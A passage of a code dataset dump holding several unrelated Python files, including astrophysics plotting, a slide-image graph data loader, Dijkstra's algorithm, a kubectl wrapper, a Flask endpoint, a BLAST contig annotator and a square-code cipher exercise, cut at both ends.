封装帧头\n head = struct.pack('2HIQ', frameys, length, frameType, 0)\n data = head + info\n\n # 发送消息\n self.sender.senderMsg(data, hasReply)","sub_path":"mx_flow.py","file_name":"mx_flow.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"400549489","text":"## SY 20/5/19\n## Reads in power spectra of 100 realisations of estimated kappa for midpoint & optimal estimators.\n## Plots cross-cf error bars (for noisy and noiseless datasets) for input and estimated kappa.\n\nfrom astropy.io import fits\nimport healpy as hp\nimport scipy as sp\nimport numpy as np\nimport pylab as P\nimport kappa_lya\nfrom kappa_lya import *\nimport sys\nfrom collections import OrderedDict\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.offsetbox import AnchoredText\n\ndef rebin(Cls,ellmin=40, ellmax=768, nell=7):\n '''Smooth curves by rebinning Cls'''\n ell = np.arange(Cls.size)\n weights = 2.*ell+1.\n if not ellmin:\n ellmin = min(ell)\n if not ellmax:\n ellmax = max(ell)\n if nell==0:\n nell = ellmax-ellmin\n\n w = (ell>=ellmin)&(ell<=ellmax)\n index = np.floor( (ell[w]-ellmin)*1./(ellmax-ellmin)*nell ).astype(int)\n well = np.bincount( index, weights=weights[w])\n sell = np.bincount( index, weights=weights[w]*ell[w])\n scl = np.bincount( index, weights=weights[w]*Cls[w])\n ell = sell/well\n Cls = scl/well\n \n return ell, Cls, well \n\n\ndef cov(cl, we):\n '''Computes weighted covariance matrix'''\n mcl = (cl*we).sum(axis=0)\n swe = we.sum(axis=0)\n w = swe>0.\n mcl[w] /= swe[w]\n wcl = we*(cl-mcl)\n print(\"Computing cov...\")\n co = wcl.T.dot(wcl)\n sswe = swe*swe[:,None]\n w = sswe>0.\n co[w] /= sswe[w]\n return co\n\ndef get_vals(Cl_crosses_in, Cl_inputs):\n\n ##- Trim off smallest and largest scales (gives 7 bins of ell=104)\n Cl_crosses = Cl_crosses_in[:,40:768]\n\n ##- Rebin\n cross_rebin = []\n cross_weights = []\n\n for i,j in enumerate(Cl_crosses):\n ell, crosses, cross_wei = rebin(Cl_crosses[i])\n cross_rebin.append(crosses)\n cross_weights.append(cross_wei)\n\n cross_cl = np.asarray(cross_rebin)\n cross_we = np.asarray(cross_weights)\n cross_mean = (np.sum(cross_cl*cross_we,axis=0) / np.sum(cross_we,axis=0))\n\n input_mean = (np.sum(Cl_inputs, axis=0) / 100)\n\n ##- Calculate covariance matrices, variance and errors\n QW = (cross_cl-cross_mean)*cross_we\n cross_cov = QW.T.dot(QW)/cross_we.T.dot(cross_we)\n cross_var = sp.diagonal(cross_cov)\n cross_stdev = np.sqrt(cross_var)\n #cross_stdev = np.sqrt(cross_var/100)\n\n ##- Calc chi2\n chi2 = np.sum((cross_mean - 0.)**2/cross_stdev**2 )\n\n return ell, cross_mean, cross_stdev, input_mean, chi2\n\n\n##- Open kappa true-correlation files\nkxi = fits.open('kappa-gaussian-true-70-100.fits.gz')[1].data.kappa\nwkxi = fits.open('kappa-gaussian-true-70-100.fits.gz')[1].data.wkappa\nkxi_input = fits.open('est_maps_noiseless/kappa_input1.fits')[1].data.I\n\n##- Get resolution of map\nnside=int(hp.npix2nside(kxi.size))\n\n##- Mask off areas outside DESI footprint\nmask = wkxi!=0\nmask &= (kxi>np.percentile(kxi[mask], 0.5)) & \\\n (kxi 0:\n job.append(shard[end:])\n\n # parallelly run them\n output = p.map(featurize_shard, job)\n\n # reunion the result\n shard_X, shard_L = [], []\n for piece in output:\n shard_X += piece[0]\n shard_L += piece[1]\n\n else:\n shard_X, shard_L = featurize_shard(shard)\n\n padded_X, padded_L = [], []\n size_x = []\n for x, l in zip(shard_X, shard_L):\n paded_x = np.lib.pad(x,\n ((0, MAX_NUM_POINT - x.shape[0]), (0, 0)),\n 'constant',\n constant_values=(-1, -1))\n paded_l = np.lib.pad(l,\n ((0, MAX_NUM_POINT - l.shape[0]), (0, MAX_NUM_POINT - l.shape[1])),\n 'constant',\n constant_values=(-1, -1))\n\n padded_X.append(paded_x)\n padded_L.append(paded_l)\n size_x.append(x.shape[0])\n\n padded_X = np.stack(padded_X).astype(np.float32)\n padded_L = np.stack(padded_L).astype(np.float32)\n size_x = np.squeeze(np.stack(size_x)).astype(np.int32)\n\n basename = \"shard_{}\".format(shard_num)\n \"\"\"save to local\"\"\"\n metadata_rows.append(write_data_to_disk(train_dir,\n basename,\n padded_X,\n shard_y,\n padded_L,\n size_x,\n shard_name,\n shard_nodes))\n\n \"\"\" add up to list\"\"\"\n all_X.append(padded_X)\n all_L.append(padded_L)\n all_y.append(shard_y)\n all_names += shard_name\n all_size_x.append(size_x)\n all_node_img += shard_nodes\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y)).astype(np.int32)\n all_size_x = np.squeeze(np.concatenate(all_size_x)).astype(np.int32)\n\n # \"pad X and L\"\n # max_atom_train = find_max_atom(all_L)\n # max_atom = max_atom_train\n\n \"\"\" save the meta data to local \"\"\"\n meta_data1 = list()\n meta_data1.append(metadata_rows)\n meta_data1.append(MAX_NUM_POINT)\n with open(os.path.join(train_dir, 'meta.pkl'), 'wb') as f:\n pickle.dump(meta_data1, f)\n\n # train_num = int(padded_X.shape[0] * 0.5)\n\n # create output dataset\n train_dataset = dict()\n train_dataset['X'] = all_X\n train_dataset['y'] = all_y\n train_dataset['names'] = all_names\n train_dataset['L'] = all_L\n train_dataset['size'] = all_size_x\n\n print(\"Loading and Processing Testing Data......\")\n metadata_rows = []\n all_X, all_y, all_L, all_names, all_size_x, all_node_img = [], [], [], [], [], []\n for shard_num, (shard, shard_y, shard_name, shard_nodes) in enumerate(get_shards([],\n TEST_FILES_GBM,\n shard_size,\n False)):\n \"\"\"shard is ndarray of 3D mesh point 3-dimension, [pc_id, point_id, (x,y,z)]\n y is the class id for each sample (3D mesh), int type\n \"\"\"\n print('Featurizing Testing Data , Shard - %d' % shard_num)\n if parallel:\n # split jobs into pieces\n num_process = 8\n size_piece = int(len(shard) // num_process)\n job = []\n for id_pieces in range(num_process):\n start = id_pieces * size_piece\n end = (id_pieces + 1) * size_piece\n job.append(shard[start: end])\n if len(shard[end:]) > 0:\n job.append(shard[end:])\n # parallelly run them\n output = p.map(featurize_shard, job)\n\n # reunion the result\n shard_X, shard_L = [], []\n for piece in output:\n shard_X += piece[0]\n shard_L += piece[1]\n else:\n shard_X, shard_L = featurize_shard(shard)\n\n padded_X, padded_L = [], []\n size_x = []\n for x, l in zip(shard_X, shard_L):\n paded_x = np.lib.pad(x,\n ((0, MAX_NUM_POINT - x.shape[0]), (0, 0)),\n 'constant',\n constant_values=(-1, -1))\n paded_l = np.lib.pad(l,\n ((0, MAX_NUM_POINT - l.shape[0]), (0, MAX_NUM_POINT - l.shape[1])),\n 'constant',\n constant_values=(-1, -1))\n\n padded_X.append(paded_x)\n padded_L.append(paded_l)\n size_x.append(x.shape[0])\n\n padded_X = np.stack(padded_X).astype(np.float32)\n padded_L = np.stack(padded_L).astype(np.float32)\n size_x = np.squeeze(np.stack(size_x)).astype(np.int32)\n\n basename = \"shard_{}\".format(shard_num)\n \"\"\"save to local\"\"\"\n metadata_rows.append(write_data_to_disk(test_dir,\n basename,\n padded_X,\n shard_y,\n padded_L,\n size_x,\n shard_name,\n shard_nodes))\n\n \"\"\" add up to list\"\"\"\n all_X.append(padded_X)\n all_L.append(padded_L)\n all_y.append(shard_y)\n all_names += shard_name\n all_size_x.append(size_x)\n all_node_img += shard_nodes\n\n \"create label array\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y)).astype(np.int32)\n all_size_x = np.squeeze(np.concatenate(all_size_x)).astype(np.int32)\n\n # \"pad X and L\"\n # max_atom_test = find_max_atom(all_L)\n # max_atom = max(max_atom_test, max_atom_train)\n\n \"\"\" save the meta data to local \"\"\"\n meta_data2 = list()\n meta_data2.append(metadata_rows)\n meta_data2.append(MAX_NUM_POINT)\n with open(os.path.join(test_dir, 'meta.pkl'), 'wb') as f:\n pickle.dump(meta_data2, f)\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n # create output dataset\n test_dataset = dict()\n test_dataset['X'] = all_X\n test_dataset['y'] = all_y\n test_dataset['names'] = all_names\n test_dataset['L'] = all_L\n test_dataset['size'] = all_size_x\n\n return train_dataset, test_dataset, MAX_NUM_POINT\n\n\ndef write_data_to_disk(\n data_dir,\n basename,\n X,\n y,\n L,\n size,\n names,\n node_img):\n \"\"\"\n Write data to local as joblib format\n\n \"\"\"\n out_X = \"%s-X.joblib\" % basename\n io_utils.save_to_disk(X, os.path.join(data_dir, out_X))\n\n out_y = \"%s-y.joblib\" % basename\n io_utils.save_to_disk(y, os.path.join(data_dir, out_y))\n\n out_L = \"%s-L.joblib\" % basename\n io_utils.save_to_disk(L, os.path.join(data_dir, out_L))\n\n out_size = \"%s-size.joblib\" % basename\n io_utils.save_to_disk(size, os.path.join(data_dir, out_size))\n\n out_names = \"%s-name.joblib\" % basename\n io_utils.save_to_disk(names, os.path.join(data_dir, out_names))\n\n out_node_img = \"%s-node_img.joblib\" % basename\n io_utils.save_to_disk(node_img, os.path.join(data_dir, out_node_img))\n\n # note that this corresponds to the _construct_metadata column order\n return {'basename': basename, 'X': out_X,\n 'y': out_y, 'name': out_names,\n 'L': out_L, 'size': out_size,\n 'node_img': out_node_img}\n\n\ndef get_shards(data_dir, file_list, shard_size, istraining):\n\n \"\"\" shuffle the data files\"\"\"\n file_idxs = np.arange(0, len(file_list))\n np.random.shuffle(file_idxs) # randomly extract data from files\n\n shard_num = len(file_list) // shard_size\n\n for shard_idx in range(shard_num):\n\n start_idx = shard_idx * shard_size\n end_idx = (shard_idx + 1) * shard_size\n shard_files_idxs = file_idxs[start_idx: end_idx]\n\n all_data, all_label, all_names, all_node_img = [], [], [], []\n for fn in shard_files_idxs:\n\n if not data_dir:\n raw_data = np.load(file_list[fn])\n else:\n raw_data = np.load(os.path.join(data_dir, file_list[fn]))\n\n current_data = raw_data['vgg_features']\n node_img_path = raw_data['img_path']\n # pid = raw_data['pid']\n # time = raw_data['time']\n if len(current_data) < MIN_NUM_POINT:\n # skip WSI of too few patches\n continue\n\n # if len(current_data) > MAX_NUM_POINT:\n # continue\n\n curr_path = file_list[fn]\n\n curr_type = curr_path.split('/')[-4]\n curr_filename = curr_path.split('/')[-1]\n\n if curr_type == 'LUAD':\n # LUAD -> class 0, LUSC -> class 1\n current_label = 0\n else:\n current_label = 1\n\n # if istraining:\n \"random select at most MAX_NUM_POINT nodes for WSI\"\n list_node_idx = np.arange(0, current_data.shape[0])\n np.random.shuffle(list_node_idx)\n sel_ids = list_node_idx[0: MAX_NUM_POINT]\n\n current_data = current_data[sel_ids]\n current_data = np.expand_dims(current_data, 0)\n node_img_path = node_img_path[sel_ids]\n\n all_data.append(current_data)\n all_label.append(current_label)\n all_names.append(curr_filename)\n all_node_img.append(node_img_path)\n\n \"\"\" create numpy for all data and label\"\"\"\n all_label = np.squeeze(np.hstack(all_label))\n\n yield all_data, all_label, all_names, all_node_img\n\n\ndef find_max_atom(dataset):\n # find the maximum atom number in whole datasests\n max_n = 0\n for elm in dataset:\n max_n = max(elm.shape[0], max_n)\n return max_n\n\n\ndef featurize_shard(shard):\n\n \"\"\"\n convert ndarray (n-sample, n_point of sample, 3-d)\n :param shard: ndarray, point cloud raw data\n :return: graph object for each sample\n \"\"\"\n X = [] # to save the graph object\n L = []\n n_samples = len(shard)\n for idx in range(n_samples):\n print(\"processing sample %s\\n\" % str(idx))\n # iterate each pc in shard\n P = np.squeeze(np.array(shard[idx]))\n\n # do not need a clustering, use original points\n node_features = P\n adj_list, adj_matrix = gl.get_adjacency(node_features)\n Laplacian = gl.compute_laplacian(adj_list, normalized=False)\n X.append(node_features)\n L.append(Laplacian)\n\n return X, L\n\n\ndef load_back_from_disk(data_dir, istrain=True):\n \"\"\"\n load data backas Train/test from disk\n :return: Train/Test STDiskDataset\n \"\"\"\n \"\"\"load back metadata_df\"\"\"\n meta_data = pickle.load(open(os.path.join(data_dir, 'meta.pkl'), 'rb'))\n metadata_rows = meta_data[0]\n max_node = meta_data[1]\n\n \"\"\"itershard by loading from disk\"\"\"\n all_X, all_y, all_size, all_L, all_names, all_node_img = [], [], [], [], [], []\n\n for _, row in enumerate(metadata_rows):\n X = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['X'])))\n L = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['L'])))\n y = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['y'])))\n size = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['size'])))\n names = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['name'])))\n node_img = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['node_img'])))\n\n \"\"\" stack to list\"\"\"\n all_X.append(X)\n all_y.append(y)\n all_L.append(L)\n all_size.append(size)\n all_names.append(names)\n all_node_img.append(node_img)\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y))\n all_size = np.squeeze(np.concatenate(all_size))\n all_names = np.squeeze(np.concatenate(all_names))\n all_node_img = np.squeeze(np.concatenate(all_node_img))\n\n # create output dataset\n dataset = dict()\n if istrain:\n dataset['X'] = all_X[:TRAIN_NUM]\n dataset['y'] = all_y[:TRAIN_NUM]\n dataset['size'] = all_size[:TRAIN_NUM]\n dataset['L'] = all_L[:TRAIN_NUM]\n dataset['name'] = all_names[:TRAIN_NUM]\n dataset['node_img'] = all_node_img[:TRAIN_NUM]\n else:\n dataset['X'] = all_X[:TEST_NUM]\n dataset['y'] = all_y[:TEST_NUM]\n dataset['size'] = all_size[:TEST_NUM]\n dataset['L'] = all_L[:TEST_NUM]\n dataset['name'] = all_names[:TEST_NUM]\n dataset['node_img'] = all_node_img[:TEST_NUM]\n\n return dataset, max_node\n\n\ndef load(dataset_name='processed_500maxnode'):\n\n \"\"\"Load chemical datasets. Raw data is given as SMILES format\"\"\"\n # data_dir = os.path.join('../data/modelnet40_ply_hdf5_2048')\n # assert os.path.exists(data_dir)\n\n processed_data_dir = os.path.join(DATA_DIR, dataset_name)\n if not os.path.exists(processed_data_dir):\n os.makedirs(processed_data_dir)\n\n if len(os.listdir(processed_data_dir)) != 0:\n\n # print(\"Loading Saved Data from Disk.......\")\n\n \"\"\" pre-defined location for saving the train and test data\"\"\"\n train_dir = os.path.join(processed_data_dir, 'train')\n test_dir = os.path.join(processed_data_dir, 'test')\n\n train, max_node = load_back_from_disk(data_dir=train_dir, istrain=True)\n test, max_node_test = load_back_from_disk(data_dir=test_dir, istrain=False)\n max_node = max(max_node, max_node_test)\n\n else:\n train, test, max_node = featurize(\n processed_data_dir,\n shard_size=16)\n\n return train, test, max_node\n\n\ndef main():\n load('processed_{}maxnode'.format(MAX_NUM_POINT))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/WSI_GBM_loader.py","file_name":"WSI_GBM_loader.py","file_ext":"py","file_size_in_byte":17209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"166141789","text":"# https://www.hackerearth.com/practice/algorithms/graphs/shortest-path-algorithms/practice-problems/algorithm/shortest-path-revisited-9e1091ea/\n# https://bradfieldcs.com/algos/graphs/dijkstras-algorithm/\nimport heapq\nfrom collections import defaultdict\n\n# Graph is stored here. \ngraph = defaultdict(list)\n\n# Stores path from start node to all other nodes, initialized to inf initially. \nres = {}\n\ndef shortest_path(start_node):\n seen = set()\n heap = []\n res[start_node] = (0, 0, None) \n heapq.heappush(heap, (0, start_node))\n while heap:\n # Lets check nodes of this node.\n currVal, v = heapq.heappop(heap)\n if v not in seen:\n for neighbour, value in graph[v]:\n if currVal + value < res[neighbour][0]:\n # Path weight, edge weight, parent node\n res[neighbour] = (currVal + value, value, v)\n heapq.heappush(heap, (currVal+value, neighbour)) \n seen.add(v)\n\n# finds path from every node to start_node if possible. \ndef findPath(res, start_node):\n paths = defaultdict(list)\n for node in res.keys():\n curr_node, edge_val, parent = res[node]\n while parent != None:\n paths[node].append(edge_val)\n _, edge_val, parent = res[parent]\n return paths\n\n\nif __name__ == \"__main__\":\n # n = vertices, m = edges\n n, m, free_tickets = map(int, input().split())\n for i in range(m):\n try:\n a, b, value = map(int, input().split())\n graph[a].append((b, value))\n graph[b].append((a, value))\n except:\n break\n # We also store (distance from source, parent)\n res = {k:(float('inf'), None, None) for k in range(1, n+1)}\n shortest_path(1)\n paths = findPath(res, start_node=1)\n ans = list(paths.values())\n print(ans)\n # Reverse this path arrays \n new_ans = [sorted(arr, reverse=True) for arr in ans]\n print(new_ans)\n # ans = list(res.values())\n # del ans[0]\n # print(*ans)\n# print(graph)\nprint(res)\n\n\n","sub_path":"hackerearth/shortest_path_path.py","file_name":"shortest_path_path.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"54607173","text":"from unittest import TestCase\n\nfrom test.common import *\n\nfrom main.common.util.file_util import FileUtil\nfrom main.data.giga_world import GigaWorldDataLoader\n\n\nclass TestDataLoader(TestCase):\n\n def test(self):\n dataloader = GigaWorldDataLoader(\n FileUtil.get_file_path(conf('train:article-file')),\n FileUtil.get_file_path(conf('train:summary-file')), 15)\n\n counter = 0\n while True:\n batch = dataloader.next_batch()\n if batch is None:\n break\n\n counter += len(batch)\n\n print(counter)\n\n print(batch)\n\n\n\n\n\n\n\n\n","sub_path":"test/test_dataLoader.py","file_name":"test_dataLoader.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487622322","text":"import logging\nimport subprocess\nfrom typing import List\n\nlogger = logging.getLogger(__name__)\n\n\nclass KubernetesClient:\n def __execute(self, args: List[str]) -> subprocess.CompletedProcess:\n command = ' '.join(args)\n logger.debug(f'Executing kubectl command: {command}')\n\n return subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n\n def create(self, name: str, type: str, args: List[str] = []) -> bool:\n args = ['kubectl', 'create', type, name] + args\n process = self.__execute(args)\n\n if f'{type}/{name} created' in process.stdout:\n return True\n\n if (\n f'Error from server (AlreadyExists): {type}s \"{name}\" already exists' in process.stderr\n or f'Error from server (AlreadyExists): {type} \"{name}\" already exists' in process.stderr\n ):\n return True\n\n logger.debug(f'kubectl failed to create {type} {name}')\n logger.debug(f'kubectl create stdout: {process.stdout}')\n logger.debug(f'kubectl create stderr: {process.stderr}')\n\n return False\n\n def delete(self, name: str, type: str, args: List[str] = []) -> bool:\n args = ['kubectl', 'delete', type, name] + args\n process = self.__execute(args)\n\n if f'{type} \"{name}\" deleted' in process.stdout:\n return True\n\n if (\n f'Error from server (NotFound): {type}s \"{name}\" not found' in process.stderr\n or f'Error from server (NotFound): {type} \"{name}\" not found' in process.stderr\n ):\n return True\n\n logger.debug(f'kubectl failed to delete {type} {name}')\n logger.debug(f'kubectl delete stdout: {process.stdout}')\n logger.debug(f'kubectl delete stderr: {process.stderr}')\n\n return False\n","sub_path":"server/kubernetes_client.py","file_name":"kubernetes_client.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202372252","text":"# coding: utf-8\r\n\r\n# Developer : Jeong Wooyoung\r\n# Contact : gunyoung20@naver.com\r\n\r\nimport argparse\r\nimport os\r\n\r\n#########################################################################################################\r\n### initialize parameter ################################################################################\r\ndef parse_args(model_name = 'LSTM', results_path=os.getcwd()+'/results/'):\r\n\r\n desc = \"Tensorflow implementation of 'LSTM'\"\r\n parser = argparse.ArgumentParser(description=desc)\r\n\r\n # Data parameter ##############################################################################################\r\n parser.add_argument('--quantilize', type=bool, default=True, help='Boolean for choosing quantilize or not')\r\n parser.add_argument('--n_quantilize', type=int, default=10, help='Number of quantilizations')\r\n\r\n # Learning parameter ##########################################################################################\r\n parser.add_argument('--model_name', type=str, default=model_name,\r\n choices=['Bidirectional_LSTM', 'CNN', 'ResNet', 'AlexNet', 'VGG', 'LSTM'],\r\n help='ML train model name\\n')\r\n parser.add_argument('--model_path', type=str, default=results_path+model_name+'/models', help='File path of output images')\r\n parser.add_argument('--results_path', type=str, default=results_path+model_name+'/', help='File path of output images')\r\n parser.add_argument('--file_cnt', type=int, default=4, help='Number of data files')\r\n\r\n parser.add_argument('--keep_prob_cell', type=float, default=.9, help='rate dropout cell')\r\n parser.add_argument('--keep_prob_layer', type=float, default=.9, help='rate dropout layer')\r\n\r\n parser.add_argument('--n_layers', type=int, default=2, help='Number of hidden layers')\r\n\r\n parser.add_argument('--n_hidden', type=int, default=50, help='Number of hidden units')\r\n\r\n parser.add_argument('--learning_rate', type=float, default=1e-4, help='Learning rate for Adam optimizer')\r\n\r\n parser.add_argument('--num_epochs', type=int, default=1000, help='The number of epochs to run')\r\n\r\n parser.add_argument('--batch_size', type=int, default=100, help='Batch size')\r\n parser.add_argument('--output_size', type=int, default=1, help='Output size')\r\n\r\n args = parser.parse_args()\r\n print(args)\r\n return check_args(args)\r\n\r\n\"\"\"checking arguments\"\"\"\r\ndef check_args(args):\r\n\r\n # --results_path\r\n try:\r\n\r\n os.makedirs(args.results_path)\r\n except(FileExistsError):\r\n pass\r\n # delete all existing files\r\n # files = glob.glob(args.results_path+'/*')\r\n # for f in files:\r\n # os.remove(f)\r\n\r\n # --n_hidden\r\n try:\r\n assert args.n_hidden >= 1\r\n except:\r\n print('number of hidden units must be larger than one')\r\n\r\n # --learn_rate\r\n try:\r\n assert args.learn_rate > 0\r\n except:\r\n print('learning rate must be positive')\r\n\r\n # --num_epochs\r\n try:\r\n assert args.num_epochs >= 1\r\n except:\r\n print('number of epochs must be larger than or equal to one')\r\n\r\n # --batch_size\r\n try:\r\n assert args.batch_size >= 1\r\n except:\r\n print('batch size must be larger than or equal to one')\r\n\r\n return args","sub_path":"ELMO/knowledge_based_sentiment_analysis/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"572288394","text":"from flask import jsonify, make_response\n\nsurveys = [{\n \"id\": \"cb0711c3-0ac8-41d3-ae0e-567e5ea1ef87\",\n \"longName\": \"Business Register and Employment Survey\",\n \"shortName\": \"BRES\"\n}, {\n \"id\": \"aaaaaaaa-0ac8-41d3-ae0e-567e5ea1eddd\",\n \"longName\": \"Another ONS Survey\",\n \"shortName\": \"NOTBRES\"\n}]\n\n#\n# /surveys/{id}\n#\n\n\ndef surveys_id_get(id):\n \"\"\"\n Get survey by survey id\n\n :param id: Survey identifier (uuid)\n :type id: str\n\n :rtype: None\n \"\"\"\n if id == 'id_example':\n id = 'cb0711c3-0ac8-41d3-ae0e-567e5ea1ef87'\n for doc in surveys:\n if doc['id'] == id:\n return make_response(jsonify(doc), 200)\n return make_response(jsonify('Not found'), 404)\n","sub_path":"swagger_server/controllers/survey_controller.py","file_name":"survey_controller.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642537540","text":"# PointOnSphereTest.py\r\n\r\ntable = {\r\n\t'o' : { 'o' : 0.0, '\\\\infty' : -1.0, 'euclid' : 0.0 },\r\n\t'\\\\infty' : { 'o' : -1.0, '\\\\infty' : 0.0, 'euclid' : 0.0 },\r\n\t'euclid' : { 'o' : 0.0, '\\\\infty' : 0.0, 'euclid' : None }\r\n}\r\n\r\ndef c3ga_bform( vecA, vecB ):\r\n\t\r\n\tif vecA != 'o' and vecA != '\\\\infty':\r\n\t\tvecA = 'euclid'\r\n\tif vecB != 'o' and vecB != '\\\\infty':\r\n\t\tvecB = 'euclid'\r\n\r\n\treturn table[ vecA ][ vecB ]\r\n\r\nreg_bform( c3ga_bform )\r\n\r\nno = Number( vector = 'o' )\r\nni = Number( vector = '\\\\infty' )\r\n\r\nx = Number( vector = 'x' )\r\npw = Number( scalar = 'w_p' )\r\n\r\np = ( no + x + 0.5*(x|x)*ni )\r\nlatex(p)\r\n\r\nc = Number( vector = 'c' )\r\nr = Number( scalar = 'r' )\r\nsw = Number( scalar = 'w_s' )\r\n\r\ns = ( no + c + 0.5*( (c|c) - (r*r) )*ni )\r\nlatex(s)\r\n\r\nt = p|s\r\nt.simplify()\r\nlatex(t)\r\n\r\n# PointOnSphereTest.py","sub_path":"wxAlgSys/Scripts/PointOnSphereTest.py","file_name":"PointOnSphereTest.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489883345","text":"#!/usr/bin/env python3\n#\n#Created on Sat Jun 7 14:27:49 2014\n#\n#@author: RDT\n#adapted by: CAR\n#\n\nfrom Bio import SeqIO\nimport csv\nimport sys\nfrom tqdm import tqdm\n\ndef get_seqs(seqfile, matches, outfile, comparecolumn, keepcolumn):\n #Open fasta contigs and return iterator of SeqRecords with protein sequences.\n records = SeqIO.parse(seqfile, \"fasta\")\n seqlist=[]\n matchlist=[]\n with open(matches,\"rU\") as f:\n reader = csv.reader(f,delimiter=\"\\t\")\n for row in reader:\n matchlist.append(row)\n print(\"Blast file successfully read\")\n print(\"Comparing contigs to Blast file\")\n\n proteinid = []\n for rec in tqdm(records):\n proteinid.clear()\n for match in matchlist:\n if match[0] == rec.id:\n for x in comparecolumn:\n if match[x] not in proteinid:\n proteinid.append(match[x])\n rec2 = rec[:]\n\n for column in keepcolumn:\n rec2.description += \"\\t\" + match[int(column)]\n\n seqlist.append(rec2)\n continue\n else:\n continue\n else:\n continue\n\n\n print(\"Writing annotated contigss\")\n with open(outfile, \"w\") as f:\n SeqIO.write(seqlist, f, \"fasta\")\n\n\n\ndef main():\n get_seqs(contigs, blast_hits, outfile, comparecolumn, keepcolumn)\n print (\"outfile is\", outfile)\n\n\n\n#grab arguments from console and pass them to python script\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n\n ####flags for the required inputs\n req_grp = parser.add_argument_group(title='required arguments')\n req_grp.add_argument(\"-c\", \"--contig_file\", dest = \"contigs\", required=True, help=\"Contigs input file \")\n req_grp.add_argument(\"-b\", \"--blast_hits\", dest = \"blast_hits\", required=True, help=\"Blast Input File\")\n ####end of flags for the required inputs\n\n parser.add_argument(\"-comp\", \"--colcompare\", dest = \"comparecolumn\", help = \"Column for Comparison, starts counting at '0' (default: 1)\", default = \"1\")\n parser.add_argument(\"-keep\", \"--colkeep\", dest = \"keepcolumn\", help = \"Columns to Keep, starts counting at '0' (default: 1, 2, 3, 10,13)\", default = \"1,2,3,10,13\")\n\n args = parser.parse_args()\n\n #assign variables from command line arguments\n contigs = args.contigs\n blast_hits = args.blast_hits\n comparecolumn = [int(x) for x in args.comparecolumn.split(\",\")]\n keepcolumn = [int(x) for x in args.keepcolumn.split(\",\")]\n\n print(\"contigs is\", contigs)\n print(\"blast file is\", blast_hits)\n outfile = contigs + \"_matches.fasta\"#blast_hits[:blast_hits.index(\".\")]+\".fasta\"\n print(\"Column used for comparison is\", comparecolumn)\n print(\"Columns being kept include:\", keepcolumn)\n\n #run main program\n main()\n","sub_path":"pull_seqs_from_assembly.py","file_name":"pull_seqs_from_assembly.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"428220210","text":"\"\"\"\nInstructions:\n\nImplement the classic method for composing secret messages called a square code.\nGiven an English text, output the encoded version of that text.\nFirst, the input is normalized: the spaces and punctuation are removed from the English text and the message is downcased.\nThen, the normalized characters are broken into rows. These rows can be regarded as forming a rectangle when printed with intervening newlines.\nFor example, the sentence\n\"If man was meant to stay on the ground, god would have given us roots.\"\nis normalized to:\n\"ifmanwasmeanttostayonthegroundgodwouldhavegivenusroots\"\nThe plaintext should be organized in to a rectangle. The size of the rectangle (r x c) should be decided by the length of the message,\nsuch that c >= r and c - r <= 1, where c is the number of columns and r is the number of rows.\nOur normalized text is 54 characters long, dictating a rectangle with c = 8 and r = 7:\n\"ifmanwas\"\n\"meanttos\"\n\"tayonthe\"\n\"groundgo\"\n\"dwouldha\"\n\"vegivenu\"\n\"sroots \"\nThe coded message is obtained by reading down the columns going left to right.\nThe message above is coded as:\n\"imtgdvsfearwermayoogoanouuiontnnlvtwttddesaohghnsseoau\"\nOutput the encoded text in chunks that fill perfect rectangles (r X c), with c chunks of r length, separated by spaces.\nFor phrases that are n characters short of the perfect rectangle, pad each of the last n chunks with a single trailing space.\n\"imtgdvs fearwer mayoogo anouuio ntnnlvt wttddes aohghn sseoau \"\n\"\"\"\n\nimport math\n\n\ndef cipher_text(plain_text):\n plain_text = plain_text.lower()\n plain_text = \"\".join(i for i in plain_text if i.isalnum())\n if plain_text == \"\":\n return \"\"\n sqrt_of_len = math.sqrt(len(plain_text))\n if sqrt_of_len.is_integer():\n r = int(sqrt_of_len)\n c = int(sqrt_of_len)\n else:\n if len(plain_text) <= int(sqrt_of_len)*(int(sqrt_of_len) + 1):\n plain_text += \" \" * (int(sqrt_of_len)*(int(sqrt_of_len) + 1) - len(plain_text))\n r = int(sqrt_of_len)\n c = int(sqrt_of_len) + 1\n else:\n plain_text += \" \" * ((int(sqrt_of_len) + 1)**2 - len(plain_text))\n r = int(sqrt_of_len) + 